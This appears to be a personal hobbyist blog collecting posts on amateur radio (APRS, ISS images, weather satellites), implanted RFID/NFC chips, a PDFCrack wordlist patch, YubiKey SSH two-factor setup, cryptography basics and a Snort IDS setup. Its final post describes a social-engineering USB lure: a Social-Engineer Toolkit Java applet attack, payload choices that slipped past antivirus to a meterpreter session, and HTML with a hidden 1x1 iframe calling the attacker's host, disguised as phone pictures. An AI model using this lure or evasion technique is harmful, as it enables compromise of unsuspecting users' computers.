APRS: More Cool Stuff To Do With Radio

Recently, I acquired my amateur radio license and joined the Binghamton Amateur Radio Association (BARA). BARA holds meetings and is located at the Kopernik Observatory and Science Center. Among their equipment is a 2 Meter Band Yaesu radio hooked up to a computer with a Terminal Node Controller (TNC) performing digital repeating for APRS or Automatic Packet Reporting System. I worked on a project to migrate their current setup to a raspberry pi and tnc-pi based system, which meant I got to learn more about APRS!

APRS is a means of communicating real-time data, such as weather information from weather stations, station/radio tracking via GPS (Global Positioning System), text messages and more using radio. The radio transmits a series of tones which sound like a modem. The system uses digital repeaters, known as digipeaters, that take a radio signal that is broadcast from another station and repeat it to other stations. Some stations may also be connected to the Internet to relay packets over TCP/IP. Such stations are called I-gates. You can see stations and their positions on the website https://aprs.fi

Stations can choose what icon is used to represent them. Usually a blue wx is a weather station. Clicking on the station brings up more information such as current reported temperature, humidity, wind, etc. The weather station reports its data with radio!

A green star with a “D” in the center is usually digipeater stations along with their callsigns. Clicking on the station brings up other information such as equipment used, comments, last active, packet path, etc. These are the stations that listen for packets and retransmit them. If it is an I-gate, it may recieve packets from the internet and retransmit them over radio. Or an I-gate may “hear” packets on the radio and deliver data via Internet.

Some stations may use “cars/trucks/phone” as their icon to indicate mobile operation. They may transmit GPS data about their current location which allows aprs.fi to track the station. This can also be used in high altitude weather balloons to aid in tracking for recovery! Sometimes amateur radio operators give comments about what frequencies they are monitoring or talking on, allowing other operators to easily communicate with them.

There is lots of other data on this website as well, include messages and raw packet data. Since packets are relayed, it is important to note that messages/data are not private in this system. Also if the recieving station is not “online” or on the air, they will not get the message.

So what other uses are there for APRS besides weather, tracking and finding other amateur radio operators to talk with? Turns out there are a few interesting relays set up. If an operator sends a message to the callsign “SMSGTE” they can send a text message to any cell phone user! Or if an operator sends a message to “EMAIL-2” they can send an email to anyone! This means an amateur radio operator can send text messages/email while not having cell phone service-while on a hike out in the woods for example!

There are even a few digipeaters on satellites and on the International Space Station (although as of this writting the ISS digipeater is not operational)!

I’m still learning a lot about radio and APRS! If you’d like to learn more about APRS, check out http://www.aprs.org/

Contact from the International Space Station!

To celebrate Cosmonautics Day on April 12th, the International Space Station began transmitting slow scan tv images related to the Interkosmos project from April 11th-14th, using a Kenwood TM-D710 transceiver located in the Russian ISS Service module which broadcasted on the frequency 145.800 MHz. I found out about this event from an amateur satellite radio organization called amsat; and with my new interest in radio image reception, I planned to attempt to make contact with the ISS and decode some of these images.

I purchased a Baofeng UV-5R handheld radio capable of receiving radio transmissions on the specified frequency (which my SDR / antenna combo from part 1 of “Selfies from Space” could also receive, but was more unwieldy to use), and used a Sony voice recorder to record the transmissions. I could then  play back and decode the transmissions with a program on my PC called mmstv, or an app on my phone called Robot36. While it is possible to decode the recorded transmissions in realtime, I preferred to record the transmission and then try different programs/settings to decode the recording. I also used a website called satview to look up times when the International Space Station would be overhead, as these intervals would be short in duration (around 6-8 minutes) and the transmission equipment on the ISS required a minute or two of rest time between sending images. This meant that I might have only captured part of one image and then the whole of another image, or the whole of one image then part of another one, depending on timing. Finally, I also struggled with radio interference, which resulted in some of the images I captured being fuzzy.

Below are some examples of images I decoded from the ISS during this radio event:

Finally, here is a video demonstrating decoding of one of these image transmissions using the App Robot36 on my phone (Note: you may want to turn your sound down if you are sensitive to certain noises).

I look forward to future events like this, and – if I set up a radio transmitter – maybe even getting the chance to talk to an astronaut!

Picture credits:

All photos provided and owned by Gary Dewey.

Selfies from Space!

I’ve always been a space geek, interested in astronomy and cosmic travel.  Recently I’ve become obsessed with a new space-related hobby – downloading images of the Earth as signals from weather satellites! I call this hobby “selfies from space” because the images are created in real-time; if the images’ resolution were greater and you had the ability to zoom in sufficiently, then you could see me standing outside with my antenna capturing the images.

I first became interested in this hobby because I had purchased a $20 RTL-SDR (Software Defined Radio) on a whim many months ago, and decided to finally make some use of it. I did some research online and found that it was possible to capture satellite downlink data using my radio with an antenna tuned to receive the correct radio frequency. This means that the legs or poles of the antenna must have a specific length in order to resonate or vibrate at the desired radio frequency. The principle behind this resonance is similar to the phenomena of a tuning fork: when a vibrating tuning fork is placed near a stationary fork, the stationary fork begins to vibrate at the same frequency as the vibrating fork. A simple antenna design I found online which would work for this purpose is called a V-dipole antenna (https://www.rtl-sdr.com/simple-noaameteor-weather-satellite-antenna-137-mhz-v-dipole/).

Adam’s V-dipole

This antenna is a half wavelength design, which means each pole is as long as the quarter wavelength of the desired frequency. If we take the speed of light (300,000,000 meters/sec) and divide by the desired frequency (137,000,000 hertz), we get 2.1898 meters as the wavelength and .54 meters / 54 centimeters as the quarter wavelength. I bought some aluminum rods at the local Home Depot and cut them to the quarter wavelength in the TCMS metal shop; I couldn’t find a “Choc block” at Home Depot to tie the rods together, but I did find some aluminum grounding bars which worked as an acceptable substitute. I then mounted the grounding bars to a 2″x4″ piece of wood with 120º angle between each bar, inserted the cut rods into the bars, and attached a stripped piece of 50Ω coaxial cable between the grounding bars and my radio.

Finished Antenna:

The software which I use to control the radio and record the signals is called SDR#. You can download SDR# here as one package, complete with many useful plugins; you will also need to install drivers for the radio, using the installation guide linked here.

Most of the weather satellites that are available in our geographic region are sun-synchronous or polar orbiting, which means that the satellites “pass by” our location from horizon to horizon. There are also some geosynchronous weather satellites (synced with Earth’s rotation to seem stationary), but most of these are located near the equator and are out of range of my antenna. There is a very limited time to download signals from sun-synchronous satellites, as they are moving very quickly and are very far away – about 8-15 minutes per pass, and at an altitude of 520 miles above sea level. Therefore, we need to be able to predict when satellites will pass by our location so that we can be prepared to capture data from them ahead of time. There are several websites with satellite time/location data, as well as a program called Orbitron which has a few other useful features, such as frequency correction for the Doppler effect caused by the satellites moving across the sky relative to me as I receive data from it.

I have used this antenna and radio to download images from the following satellites: NOAA-15 (@ 137.620 Mhz), NOAA-18 (@ 137.9125 Mhz),  NOAA-19 (@ 137.100 Mhz), and Russia’s Meteor M2 (@ 137.900 Mhz). The NOAA satellites use an AM (amplitude modulation)-based system called APT (Automated Picture Transmission) to encode its data transmissions. If you were to attach a speaker to my radio, you could hear beeping and clicking as the transmissions are received, similar to the way in which fax machines sound/work. APT data can be decoded with many programs, including APT decoder and WXtoIMG. These programs convert the APT data into line by line pictures, and also have various enhancement / filtering tools which can be used to manipulate or add additional data to the newly-generated APT photos, such as map overlays. These photos have 2 channels, one with an data from an infrared camera or filter, and another with data from a regular spectrum camera; they also contain telemetry data on the sides of each picture.

Here are a sampling of APT photos taken by the NOAA satellites whose transmissions I captured:

The Russian Meteor M2 satellite uses the LRPT (Low Rate Picture Transmission) method of data transmission. LRPT is modulated with something called quadrature phase shift keying (QPSK), which uses differences of phases in the carrier wave (0º, 90º, 180º, or 270º) in order to send 2 bits of data at a time. It can transmit photo data with higher resolution than can be accomplished with APT, but it also requires a larger frequency bandwidth and generates larger raw files. The signal doesn’t sound like anything intelligible, just a bunch of static. Nevertheless, when demodulated with a plugin for SDR#  (which generates a .s file) and then decoded with an LRPT offline decoder, a higher resolution photo is created – as seen in the photos below. You’ll note that I get images only of geographic locations that have radio contact with the satellite (realtime scanning), and that there appears to be some black lines from missing data; some these are from signal loss, but some are caused by transmitter malfunctions from the satellite.

The meteor M2 photos are from 3 channels which, when combined, create a color photo (red, green, blue); but during night time passes, only black and white photos can be rendered (probably due to the lack of sunlight).

This project has been a fun way for me to learn more about space, satellites, weather, and radio. I was given the opportunity to give a speech at Rutger’s University for their Space Technology Association at Rutgers Club, which can be viewed at  https://youtu.be/qZ1JNfDFjqo. At the end of the speech, I gave the club 2 antennas, 2 USB software-defined radios, and DVDs containing the software they’ll need to record and decode images on their own.

I’ve also started working on a related project: using a Raspberry Pi with an SDR, antenna, and some scripts to automate the data recording process so that I can capture and create satellite images while I’m at work or sleeping. I’m also researching methods of uploading the images to Twitter automatically – because capturing and creating images is cool, but doing that while getting sleep is awesome! 🙂

Picture credits:

All photos provided and owned by Gary Dewey, except for “Adam’s v-dipole.” Admin. RTL-SDR.com. 1 March 2017. Web. 18 April 2018.

Hacking Myself

Technology can be an awesome tool and seems to be integrating into our society at an increasing rate. I find myself excited at the possibilities of new technologies and what can be achieved with them. I am especially fascinated with wireless technology. Unseen energy being utilized to accomplish various tasks – technology like WiFi, Bluetooth, RFID and NFC. It’s like magic to me.

Our makerspace uses RFID tags to gain access to the building-you scan a tag, enter a pin number which authenticates back to a server, which then powers a relay and unlocks the door. This system is great because RFID tags are cheaper than making keys for everyone and also gives us accountability for who entered at what day/time. One day I clumsily locked my keys inside the building and I needed “rescuing”. I vowed that this would never happen again! I remembered that one of our other members had taken what some would say extreme measures and had an RFID chip implanted into his hand! I had always been fascinated by this, almost like a magic trick–he would scan his hand, enter his pin and the door would open! No more losing tags/keys! The tags are in a glass tube about the size of a grain of rice (see picture below)

And so I decided to take this a step further-I would get an RFID tag implanted in one hand and an NFC tag implanted in the other hand. The RFID tag was cheap, like $10. This tag is non-programmable and contains a unique identification number. I had the number entered into our entry system and this is the tag I use to gain access to the door of the makerspace. It is in my right hand, so I “scan” my right hand and then enter a pin and voila, the makerspace door opens.

I had to drive to New York City to get my implants “installed” by a body jewelry specialist.

The chip in my left hand is nfc, or near field communication. This chip is programmable with my phone and cost around $99 (https://dangerousthings.com/shop/xnti/). I downloaded nfc tools app for my phone and also dangerousthings had an app I used first to scan my tag and program it to protect against accidental locking (locking would make it non programmable). https://play.google.com/store/apps/details?id=com.dangerousthings.nfc&hl=en

I have added my chip to trusted devices so I can unlock my phone by scanning my tag (tapping my phone to the back of my hand). I used nfc tools app to program my chip to carry my “vcard”-this is like a virtual business contact card, so if you have nfc turned on your phone, you can tap your phone on my hand and get my contact information (name,phone number, email, etc) without typing anything! Unfortunately this will not work if you have an iphone since iphone has nfc closed down for only ipay. I also created a profile to load to my chip that places a link to my resume-so if you scan my tag it prompts you to download my resume from my website! So cool-I’d hire me!

I added another profile to save my In-Case-of-Emergency information (name, allergies, blood type, emergency contact). I can see how this would be beneficial but only if emergency personnel know about the implant. I have thought about getting some sort of tattoo to indicate the implant’s presence (if you have any ideas, let me know).

I sort of feel like a spy! I am excited to see the future of implantable technology and can’t wait for the day when I can pay for coffee with my hand!

Patch for PDFCrack to use large wordlists

PDFCrack is a command line utility that can recover passwords and content from pdf files.

When I downloaded and “made” the executable for PDFCrack, I tried to use a large wordlist (15 gbs) and it would fail to open the file because it was made without “large file support” (32-bit functions).

After doing some research, I was able to modify the code and recompile to allow large wordlists to be used.

You can download the patch file I made for this here

Setting Up 2-factor authentication on backtrack5 (or Kali) sshd with a Yubikey

First of all, if you haven’t heard of a yubikey, check out http://www.yubico.com

For about $35 you can purchase a usb key called a yubikey, which can provide OTP (One-Time-Password) capabilities to various services, such as lastpass password manager (http://www.lastpass.com) and also challenge-response and/or a LONG static key.

For this article, I will be setting up sshd in backtrack5 to use 2-factor authentication-using your normal password as the first and a OTP (One-Time-Password) from your yubikey to their authentication servers as the second (this requires both machines to be connected to the Internet which usually isn’t a problem-but if you want to set up challenge-response offline authentication there are some instructions here: https://github.com/Yubico/yubico-pam/wiki/LocalAuthenticationUsingChallengeResponse

Yubico has instructions which I followed here but I will list the commands I used and go into a little more detail:https://github.com/Yubico/yubico-pam/wiki/YubikeyAndSSHViaPAM

Ok Step 1: download and build the yubico-c-client:

install yubico-c-client from git (commands are in bold and output has been truncated):

root@bt:~# git clone git://github.com/Yubico/yubico-c-client.git
root@bt:~# cd yubico-c-client/
root@bt:~/yubico-c-client# autoreconf –install
root@bt:~/yubico-c-client# ./configure
root@bt:~/yubico-c-client# make check
root@bt:~/yubico-c-client# make install

Step 2: download and install yubico-pam module. I find it is easier to add the repository then to build from git because then you don’t have to worry about all the dependencies.

root@bt:~# apt-get install python-software-properties
root@bt:~# add-apt-repository ppa:yubico/stable
root@bt:~# apt-get update
root@bt:~# apt-get install libpam-yubico
Step 3: Create token id mapping file:

root@bt:~# mkdir .yubico
root@bt:~# nano authorized_yubikeys
plug in your yubikey
type root: (or username) then press yubikey button
delete all characters after the first 12 (your id is the first 12 characters)
type control+o, press enter then control+xenter
Step 4: Edit /etc/pam.d/sshd

comment this out:
#auth required pam_env.so # [1] change next directive to be:
auth required pam_yubico.so id=16 debug authfile=/root/.yubico/authorized_yubikeys

Step 5: Edit /etc/pam.d/common-auth

add “try_first_pass to this line”:
auth [success=2 default=ignore] pam_unix.so nullok_securetry_first_pass

Step 6: Edit /etc/ssh/sshd_config

uncomment this line:
PasswordAuthentication yes

then type in a terminal: ssh restart

this is assuming you already set backtrack up for ssh service by running “sshd-generate” then update-rc.d -f ssh defaults (in a terminal) if you want sshd to startup on boot….

Step 7: Now test it out

typing your password and hitting enter should get you denied
root@localhost‘s password:
Permission denied, please try again.

but typing your password then pressing the button on the yubikey should let you in:

root@localhost‘s password:
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

System information as of Tue Jun 25 17:29:07 EDT 2013

System load: 0.03 Processes: 165
Usage of /: 34.7% of 41.19GB Users logged in: 1
Memory usage: 1%
Swap usage: 0%

Last login: Tue Jun 25 16:52:49 2013
root@bt:~#
enjoy!! 

The Basics of Cryptography, part 1

Encryption has been a buzzword in the technical world for the past few decades; but in light of recent events, such as the San Bernardino terrorism case, encryption has become important to the average person as well. Encryption is a procedure for taking ordinary information (known as plaintext) and converting it into an unrecognizable format (known as ciphertext). The history of encryption can be traced back as far as Julius Caesar, who used a substitution cipher (as shown in picture 1, below). A cipher is a pair of algorithms used to encrypt and decrypt data, like an equation. In a substitution cipher, you substitute characters in your message with other characters using some sort of scheme. In this way, Caesar would send encrypted messages to his army. For example, let’s say the substitution key is 3, so each letter is shifted to the right by 3. Using this key, “hello reader” becomes “fcjjm pcybcp”.

As you may be able to tell, this cipher is vulnerable to an attack known as frequency analysis or pattern words. In this attack, the most frequent letters are tallied and matched up with the most frequently used letters in the alphabet; with enough pattern-matching, the substitution key can usually be derived.

Another classical cipher used was the transposition cipher, where the letters are rearranged somehow to jumble the plaintext. A modern example of this which you may know is “pig latin”, where you take the first syllable of a word and move it to the back to form a new word.

The Greek military is also thought to have used stenography, which is hiding a message in plain sight. They did this using something called a scytale: they would wrap a parchment around a wooden rod, write their message on the parchment, then unwrap the parchment and add letters in between those already written (see picture 2, below). Only someone with an identical wooden rod would be able to decipher the message. Another example of early stenography was tattooing a message on a slave’s shaved head and waiting for the hair to grow back to cover up the message.

Skytala
Skytala

Stenographic methods have become increasingly complex over the past couple of millennia, with forms like invisible ink, microdots, and hiding information in the compressed space of music files (as seen in the tv show Mr. Robot) becoming popular. Another common method is to store your secret information in a photo file, since these files are also compressed and do not require all the bits to recreate the photo.

These methods of concealing information for secure communications are apart of a larger family of study called cryptography, which in Greek translates to hidden or secret writing. A fairly famous example of cryptography is the Enigma device, used by the German military during WWII to send secret messages. The large computer systems developed to help crack the Enigma code helped usher in the modern age of computers. Fast forward to today, and cryptography is used every day by ordinary people, not just spies and military personnel. Online banking and credit card transactions, email, electronic voting, anonymous web surfing, regular web surfing and social media are all areas where modern cryptography is used without many people ever realizing it.

In the information security world, there is a principle known as the C.I.A. triad, which stands for Confidentiality, Integrity, and Availability. Confidentiality is the ability to keep your information safe and secure from unauthorized entities, which can be equated with privacy. Integrity deals with the consistency, accuracy, and confidentiality of your data. Availability is just what it sounds like: having your data or services available to you and whoever else needs access at all times.  Cryptography can aid in confidentiality and integrity. As we have discussed earlier, encryption supports confidentiality by ensuring your message/data is not readable by an unauthorized party. Integrity is supported by using various cryptographic algorithms to ensure data has not been tampered with or altered; i.e., the original data is put through an equation to derive an ‘answer’, which you receive a copy of. If you then receive a copy of the data, put it through the same equation, and receive a different ‘answer’, your integrity check fails. These checks are sometimes known as hashes, of which there are various types depending on the algorithm used. They are used in a wide variety of applications, e.g. proving the integrity (lack of tampering or file corruption) of files downloaded from the Internet by checking them against their authenticated hashes or checksums.

Modern cryptography for confidentiality can be divided into two categories: symmetric key cryptography and public key cryptography. Symmetric key cryptography uses the same password or passcode to encrypt and to decrypt the data. This can be a security concern because of low confidence regarding secure sharing of the password. It may be a decent algorithm / scheme to use to encrypt data for your own use, which is what most full-disk or file system encryption systems use, but it’s not recommended for use when sharing data among multiple users. This scheme may be used to encrypt multiple kinds of devices: laptop hard drives, phones, tablets, flash/thumb drives, individual files, and so on.

The preferred method used to encrypt data shared among multiple users is public key encryption, which uses two different keys: a public key and a private key. The public key is just that, public; it’s the key you give to any other user, and can be publicly known. The private key is also just that, private, and is related to the public key in a way such that it can decrypt something encrypted with the public key. Anyone can encrypt a message for you using your public key, which you can then decrypt with your private key, which nobody should know except for you. Public keys can be also digitally signed by other users with their private keys, which means the people that have signed the key have verified the key owner’s identity. This creates a web of trust. Let’s say Don trusts/knows Bob but not Alice; since Bob trusts/knows Alice, Don inherently trusts Alice’s key/identity due to his trust of Bob.

A good example of a public key encryption system is GPG (GNU Privacy Guard), a free replacement for PGP (Pretty Good Privacy), as PGP used to be free but was bought by Symantec. GPG public key encryption can be used to encrypt email messages and files, and also has some built in features for integrity (verification of user identity). For example, let’s say Alice wants to email Bob a secure message. Alice could look up Bob’s public key from a public key server, or get it directly from Bob and use it to encrypt her email to Bob. She then digitally signs her message using her private key. When Bob receives the email, he decrypts the message using his private key, and verifies her digital signature using Alice’s public key.

Thank you for joining me for a brief history and overview of cryptography and encryption! Stay tuned for future blog posts where I hope you will join me as we explore cryptography and encryption in more detail. You will learn how to better protect yourself and your data in today’s computer age.

Text References and Resources:

“Cryptography: History of cryptography and cryptanalysis.” Wikipedia.org. Wikipedia, 25 July 2016. Web. 1 Sept. 2016.

“GNU Privacy Guard.” Wikipedia.org. Wikipedia, 15 Aug. 2016. Web. 1 Sept. 2016.

“Outline of cryptography.” Wikipedia.org. Wikipedia, 21 July 2016. Web. 1 Sept. 2016.

Picture References:

Skytala. Digital Image. Wikimedia Commons. Wikimedia Commons. 16 Feb. 2007. Web. 1 Sept. 2016.

Resources:

The Electronic Frontier Foundation, https://www.eff.org.

IDS: An Introduction to SNORT

It is important to protect yourself, now more than ever, in the digital realm. In today’s world, technology is rapidly advancing. Unfortunately, there are also advances in the so called “dark side” of technology. Viruses, worms, and malware are all increasing in distribution and in complexity. Many methods and systems exist to help protect you against these malicious agents and a layered approached is considered to be best security practice. One such layer is called an Intrusion Detection System or IDS for short. Intrusion detection is the process of monitoring computer and network activities to find breaches of security and/or possible computer/network abuse/misuse. There are basically two kinds of Intrusion Detection Systems-Network-based Intrusion Detection System (NIDS) and Host-based Intrusion Detection System (HIDS). A network-based IDS analyzes the network activity to determine if any security breaches or computer security incidents have taken place or are in the process of taking place. A host-based IDS revolves around changes in behavior and detailed logging of the particular host it is monitoring. There are advantages and disadvantages to each system. In this paper I will be focusing on network-based intrusion detection.

There are a few methods for implementing network-based intrusion detection. Analyzing traffic with signature matching, which is like how some anti-virus software works; or analyzing traffic using a baseline to establish a normalcy and determine whether unusual activities are taking place-like when a packet comes in on a different port than what the service normally uses, i.e. an SSH packet with a port number other than 22. The drawbacks to using the signature method are: just like with anti-virus signatures, the signatures the intrusion detection system uses must be current and up to date and there may be some vulnerabilities that are unknown and go unnoticed, or the attacker could change the pattern of his attack packets as to go undetected. The drawbacks of the baseline method are: there may be legitimate traffic on unconventional ports; protocols do not always follow their respective RFC’s; and a network is a dynamic entity which may be always changing so therefore the baseline must also be dynamic.

For this paper I will be experimenting with a program called Snort. Originally, the Snort program was just supposed to be a packet sniffer, which is a program that intercepts packets to be analyzed in real time. But Snort has expanded to be a packet sniffer, packet logger and also a network intrusion detection system-thus, since it is a sniffer and more, it is named Snort. Snort is a modular program consisting of many different parts. One obvious part is the sniffer, which is a libcap application-which another sniffer named “Tcpdump” also uses. The next part of Snort is called the preprocessor. The preprocessor uses different plug-ins to initially analyze the packets and decide what goes for further analyzing. This is useful to cut down on potential false positives, which is when you get an alert for something that is actually valid. This is also useful because you can turn on or off the different plugins to customize Snort for your network’s needs. The next part of Snort is the detection engine. The detection engine is where signature-based intrusion detection happens by using a bunch of rules. The rules are categorized by Trojan horses, buffer overflows, access to various applications, and various other categories. These rules can be downloaded and should be updated often, since new attacks and signatures are discovered. Snort also gives the user the ability to customize and write their very own rules. Rules are made up of a header and an option. The header is made up of what to do:log or alert; type of network packet: tcp/udp/icmp/etc., source and destination IP addresses and ports; an alert message and possibly some qualifiers. The option is made up of what to match in the packet content (the signature), a classification type, a reference and a revision number. I have provided a sample outlining its various parts (see figure 1).

Figure 1. A sample Snort rule and its various parts

When Snort finds a packet that matches the offending signature, it follows the action listed in the rule. There are eight actions that are possible but the two most common are alert and pass. The alert action produces an event, which can be logged, emailed, and sent via SMB message to a Windows machine. The pass action simply means that if the signature matches the packet, do not generate an event and stop processing the packet. Please see figure 2 below for an example of a logged event.

Figure 2. A sample alert event log.

05/07-06:29:19.956118  [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -> 255.255.255.255:67

It can be difficult to sift through many of these alerts, since a system could generate thousands of these a day, depending on the network type and traffic. There have been some programs developed to help analyze these events. One such program is called BASE, which stands for Basic Analysis and Security Engine. BASE is an Apache application that uses SQL tables to parse and analyze Snort alert events. See figure 3 for a screenshot showing the “home” page which shows lots of useful information for quick analysis, such as events by protocol.

Figure 3. A screenshot showing the BASE home screen webpage with useful information.

There are many links you can click on to get more information. For example, clicking on the total number of alerts will bring you to a page listing all alert events with their ID’s, signatures, timestamp, source address, destination address, and their layer 4 protocol (see figure 4).

Figure 4. A screenshot showing all alert events with some important details.

There are some nice options on this page, such as links to external resources explaining the possible attack (see figure 5).

Figure 5. Clicking on the Snort link in the event listing can bring you more information about the possible attack.

Clicking on the ID brings you to even more event detail, including the actual contents of the packet that triggered the alert (see figure 6).

Figure 6. A screenshot showing the alert event in detail.

For my experimenting with Snort, I had read about a live Linux distribution based on Fedora called the Network Security Toolkit (NST). NST is very handy because it comes with all the necessary “ingredients” already installed and configured to work together, such as SQL, BASE, Snort and many other useful utilities/programs. I downloaded the image file and burned it to DVD. I then used this live DVD to boot one of my laptops on my home network. Initially, I tried using a hub in between my cable modem and my router to try to catch all incoming and outgoing traffic with the probe laptop. However, the only traffic I was seeing (I used Wireshark to capture traffic before turning Snort on) was ARP requests and replies-I was not seeing any TCP traffic. I had read that a reason for this could be because the hub runs the different speeds on different backplanes, meaning 10 Mbps traffic would be separated from 100 Mbps, and my laptop/router was set to auto-negotiate at 100 Mbps. After doing some research, I was able to find firewall rules for my router (DD-WRT) that would forward a copy of all incoming and outgoing traffic to a specified IP address by using these commands below:

iptables -A PREROUTING -t mangle -j ROUTE –gw 10.0.0.110 –tee

iptables -A POSTROUTING -t mangle -j ROUTE –gw 10.0.0.110 –tee

I simply logged into my router using SSH and entered these commands. Now, when running Wireshark, I can see all traffic (TCP included) going in and out of my router from any port.

The network security toolkit provides several boot options: console, graphical desktop, etc. For my initial interactions with the NST I booted into graphical desktop mode, however this is not necessary-most, if not all, functions can be performed through a web interface. Also it is better to boot into console mode, that way the kernel doesn’t have to focus on unnecessary things like drawing windows and you will have less of a chance of it dropping packets-and dropping packets could be bad-you could potentially miss an attack. The initial password for root user is “nst2003”-you must run “nstpasswd” to change this password and this script will also setup the web server for configuring and interacting. After booting into console mode, since I have a static IP address chosen for the probe for traffic forwarding purposes, I can log on to the probe machine via web browser with HTTPS and get to the home page (see figure 7).

Figure 7. The home screen for NST provides links to many resources, such as system configuration, sensor configuration, etc.

Choosing the “NST Web User Interface (simplified)” link takes you to four other links with nice descriptions: Network tools; System Information; System Administration; and Serial port tools. To setup Snort, I clicked on the network tools link. This brings you to another page of links-click on “Network Monitoring”. This take you to yet another web page with several options, but for Snort click on the IDS(Snort) link. This will take you to a page with four options: Snort Administration; BASE Interface; Snorter Summary; and Email Snort Alerts. To setup Snort, I clicked on Snort Administration. This comes up with a web interface to help you configure Snort. Basically, for your first interaction you can click what network interface you want Snort to run on and then click setup/start Snort. However, to cut down on the number of false alerts, I configured some other options as well, such as picking the value for my home network address and picking everything but my home network addresses for external net (see figure 8).

Figure 8. The NST web interface for configuring Snort.

This will setup an SQL database for your alert events automatically and you can go to the BASE page to view them. There is also a handy option to email alerts to you. You can set a critical number of events (limit) and also get a report emailed to you every hour (it runs as a Cron job on the Fedora operating system) see figure 9 for a report that was emailed to me after setting up Snort and SnortSlinger.

Figure 9. A sample report emailed to me by the SnortSlinger perl script ran as a Cron job.

From: snortslinger@deweyweb.dyndns.org

To: deweyga@acad.sunybroome.edu

Subject: SnortSlinger Report : 3 new alerts

Date: Mon, 07 May 2012 18:01:03 +0000

#################################################################

###                       Quick Summary:

### ————————————————————-

###  Events in last hour:                3

###  Events in last day:                 49

###  Events in last week:                49

###  Total events in database:           49

###

###  Report Generated:                   Mon, 07 May 2012 18:01:02 GMT

#################################################################

#################################################################

###                Statistics for the last hour

### =============================================================

###                       Top 5 Events

### ————————————————————-

###  Count      |                  Event Type (SID)

### ————————————————————-

###  2          |  MISC MS Terminal server request (1448)

###  1          |  MISC MS Terminal Server no encryption session initiation attempt (2418)

### =============================================================

###                   Top 5 source IP addresses:

### ————————————————————-

###  Count      |           IP address

### ————————————————————-

###  3          |  66.195.64.4

### =============================================================

###                Top 5 destination IP addresses:

### ————————————————————-

###  Count      |           IP address

### ————————————————————-

###  3          |  10.0.0.133

#################################################################

#################################################################

###              Statistics for the last 24 hours

### =============================================================

###                      Top 10 Events

### ————————————————————-

###  Count      |                  Event Type (SID)

### ————————————————————-

###  33         |  BAD-TRAFFIC same SRC/DST (527)

###  12         |  ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited (486)

###  2          |  MISC MS Terminal server request (1448)

###  1          |  INFO web bug 0x0 gif attempt (2925)

###  1          |  MISC MS Terminal Server no encryption session initiation attempt (2418)

### =============================================================

###                 Top 10 source IP addresses:

### ————————————————————-

###  Count      |       IP address

### ————————————————————-

###  21         |  0.0.0.0

###  12         |  66.135.62.191

###  3          |  66.195.64.4

###  1          |  74.125.228.2

### =============================================================

###              Top 10 destination IP addresses:

### ————————————————————-

###  Count      |       IP address

### ————————————————————-

###  20         |  255.255.255.255

###  6          |  69.205.255.148

###  6          |  10.0.0.143

###  4          |  10.0.0.133

###  1          |  224.0.0.22

#################################################################

+——————————————–+

| Output generated by SnortSlinger:          |

| http://www.venom600.org/code/SnortSlinger/ |

+——————————————–+

NST has many other tools and options, too many to list for the scope of this paper, but I find it to be an excellent resource which makes setting up an IDS sensor fairly easy for the novice. So far the data I have collected hasn’t been too exciting. I have had some false calls, such as “Bad traffic” (which is more of a network configuration problem rather than an attack) and “ICMP destination unreachable” (another network configuration problem and not likely an attack). I turned some of these rules off because I am not interested in these event alerts. This is probably one of the few times I actually want someone to try an “attack” on my network.

Snort has some advanced features, which enhance its appeal as a valuable open source tool. One of these features is IPS, or Intrusion Prevention System. There is an “inline” option where you can choose to put Snort at the gateway of your external network connection and it will run like a firewall-choosing what packets to forward and which ones to drop based on the rules. Perhaps in the future I will experiment with this option. Snort is a valuable asset and I will continue to learn about it and its configurations because I believe it is an untapped resource.

References

Crothers, Tim. (2003). Implementing Intrusion Detection Systems: A Hands-On Guide for Securing the Network. IN, USA: Wiley.

Kohlenberg, Toby, et al. (2007). Snort IDS and IPS Toolkit. MA, USA: Syngress.

Network Security Toolkit: http://networksecuritytoolkit.org/nst/index.html

Social Engineering Infecting USB media project

I wanted to experiment with the social engineering toolkit in Backtrack5r3 and it was decided that I should try to create an infectious USB drive. However, I had learned that XP and newer Windows operating systems had disabled the autorun feature (vulnerability). So the need arose for a different kind of attack vector. I had thought about it and came up with an idea: create an html web page file to put on the USB drive that has an iframe tag which will load a “malicious” web site when the user clicks on it. This way, when the user clicks on the seemingly “local” file, if he’s connected to the internet, it will actually open our malicious web site being hosted by backtrack’s social engineering toolkit. Of course one of the tricks will be to make the “local” web page enticing to click on-I thought about calling it iphone pics or something like that-because I think people are inclined to view pictures. The first step is to setup the social engineering toolkit in backtrack. Open a terminal and change directory to where the toolkit is located(this article is using backtrack 5r3), then type “./set”. This will start the toolkit and the first time it is run it will ask you to agree to its terms.


Then a menu comes up for you to choose from-for this attack we select the 1st option
“Social-Engineering Attacks. Another menu appears and our attack is selection 2

Yes another menu (the social engineering toolkit is chalked full of menus) and the attack I found particularly reliable would be option 1-the java applet attack method.

In the next menu, you are given a choice of what webpage content to use-I just pick option 1 for the sake of simplicity.

Another menu where the choice is arbitrary (however I find option 1 doesn’t take a long time to load in the client’s browser, giving you more of a chance of them not closing the program before attack)
.
Then it clones a website, injects the java applet attack into the website and asks for a payload. This part took some trial and error experimenting. It seems that every time I would try a meterpreter payload, no matter how it was encoded to avoid anti-virus, Microsoft Security Essentials would step in and prevent the attack from occurring (even when I generated a binary just to autorun or a malicious pdf setup to run a binary with meterpreter payload that was encoded-Microsoft Security Essentials would delete it automatically). So I decided to try option 11-the SE Toolkit Interactive Shell and had reliable results. *UPDATE* Upon apt-get upgrade I got a newer version of SET (even though there is an update option in the menu for some reason it didn’t work?) And I tried option 14 shellCodeExec Alphanum Shellcode which made it past Microsoft Security Essentials with a successful meterpreter session established!

Once the website and payload have been set up, now we setup the usb drive with the html file. The code is very simple:img src=”./iphone/6.jpg”
img src=”./iphone/5.jpg”

img src=”./iphone/4.jpg”

img src=”./iphone/3.jpeg”

img src=”./iphone/2.jpeg”

img src=”./iphone/1.jpeg”
here’s where the “magic happens” the iframe tag: IFRAME SRC=”http://backtrack5r3-ip address” WIDTH=1 HEIGHT=1 TITLE=”Java Required”

